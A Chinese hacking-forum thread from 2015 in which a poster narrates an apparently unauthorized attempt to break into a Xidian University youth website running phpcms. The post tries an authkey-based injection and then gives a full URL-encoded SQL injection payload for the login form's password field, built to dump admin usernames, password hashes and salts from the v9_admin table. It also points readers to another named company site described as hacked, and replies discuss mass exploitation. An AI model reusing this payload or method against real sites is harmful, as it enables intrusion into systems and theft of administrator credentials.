请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 3577|回复: 27

渗透西安电子计算机学院(待续)

[复制链接]
  • TA的每日心情
    奋斗
    2016-7-14 17:48
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-8-31 09:32:32 | 显示全部楼层 |阅读模式
    这一次没有拿下来,所以列为《装逼三十六计走为上计》

    准确的说是还没有完全检测,所以标题加了一个待续,只是给大家分享一下过程!给新手一个思路。


    故事是这样的:

                                   
    登录/注册后可看大图

    这种计算机大学我觉得还是挺难搞的
    于是找了下站点,旁站和c段全部都是edu

                                   
    登录/注册后可看大图



    好,我们不管他有多少edu,就是干,检测了一下,大部分都是dedecms


    发现一个显眼的phpcms 。目标站:http://youth.xidian.edu.cn
    phpcms直接爆authkey进行注入

                                   
    登录/注册后可看大图

    这个就是Key了,接着直接进行注射。
    然后我失败了


    我找一个成功的图给大家看

                                   
    登录/注册后可看大图

    这是某位前辈写的最原始的exp,我和他的方法不一样,exp也不一样
    这是我的exp

                                   
    登录/注册后可看大图

    上面发的成功的exp并不一样,但是我的exp是应该没问题的。
    这里就应该能想到 (并不是所有key都能注射的)


    到了这里卡住了,换个思路!继续!
    尝试从登录框突破
    访问地址:http://youth.xidian.edu.cn/index.php?m=member&c=index&a=login
    这个时候准备工具: 小葵编码转换、BurpLoader
    然后先不要登录,我们要抓登录的包

                                   
    登录/注册后可看大图

    然后我们用以下代码替换password
    123456%26username%3d%2527%2bunion%2bselect%2b%25272999999%2527%252c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252c0x272C2873656C656374202831292066726F6D206D7973716C2E7573657220776865726520313D3120614E64202853454C45435420312046524F4D202873656C65637420636F756E74282A292C636F6E63617428666C6F6F722872616E642830292A32292C28737562737472696E67282853656C656374202873656C65637420636F6E63617428757365726E616D652C307833612C70617373776F72642C307833612C656E6372797074292066726F6D2076395F61646D696E206C696D697420302C3129292C312C3632292929612066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C65732067726F75702062792061296229292C27%252c111%252c222%252c0x33333333272923%252c444%252c555%252c666%252cnull%2523

                                   
    登录/注册后可看大图
    放包以后提示登录失败,我特么好悲伤啊。既然都这样了,证明这个漏洞也是不存在的。后面的代码转换等就没法讲了。(如果你遇到了可以找我,能成功拿下也可以给大家分享一下)

    不愧是计算机学院。无懈可击。

    要么是我漏洞利用步骤错了,要么是还有其他洞我没找到的,总之这个站是拿不下来了

    正准备找他“邻居”下手的时候,听说有前辈把加多宝拿下了。。。

    于是我就。。围观地址:http://www.jdb.cn/95zz.html



    既然去日加多宝了,那么这个事情就搁浅了。最近还会抽时间看一下,如果拿下来了就来分享一下过程



    最后我想问,大家最近都忙什么呢,没人分享啦












    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2016-12-24 18:41
  • 签到天数: 94 天

    [LV.6]常住居民II

    发表于 2015-8-31 09:47:05 | 显示全部楼层
    沙发·~~~~~~~

    评分

    参与人数 1下载币 +10 收起 理由
    Mr.Ramnit + 10 赞一个!

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-8-19 19:24
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2015-8-31 10:27:57 | 显示全部楼层
    都开学了- -
  • TA的每日心情

    2015-10-4 15:36
  • 签到天数: 26 天

    [LV.4]偶尔看看III

    发表于 2015-8-31 10:44:05 | 显示全部楼层
    可惜那个登录页面有验证码,不然可以批量了
  • TA的每日心情
    擦汗
    前天 12:08
  • 签到天数: 261 天

    [LV.8]以坛为家I

    发表于 2015-8-31 10:57:01 | 显示全部楼层
    果断时间我也出个文章分享下:loveliness:
  • TA的每日心情
    擦汗
    17 小时前
  • 签到天数: 278 天

    [LV.8]以坛为家I

    发表于 2015-8-31 11:18:29 | 显示全部楼层
    6楼  7楼是撒B   5L给我sb

    点评

    sb  发表于 2015-9-21 00:42
  • TA的每日心情
    奋斗
    2016-12-25 09:26
  • 签到天数: 67 天

    [LV.6]常住居民II

    发表于 2015-8-31 17:26:22 | 显示全部楼层
    开学了。。。
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-11-18 12:56
  • 签到天数: 160 天

    [LV.7]常住居民III

    发表于 2015-8-31 18:48:02 | 显示全部楼层
    已经开学了
  • TA的每日心情

    2016-9-5 17:46
  • 签到天数: 17 天

    [LV.4]偶尔看看III

    发表于 2015-8-31 23:02:49 | 显示全部楼层
    phpcms会员注册那里的注入
  • TA的每日心情

    2016-6-5 18:30
  • 签到天数: 126 天

    [LV.7]常住居民III

    发表于 2015-9-1 16:04:47 | 显示全部楼层
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-1-22 20:28 , Processed in 0.184386 second(s), 37 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表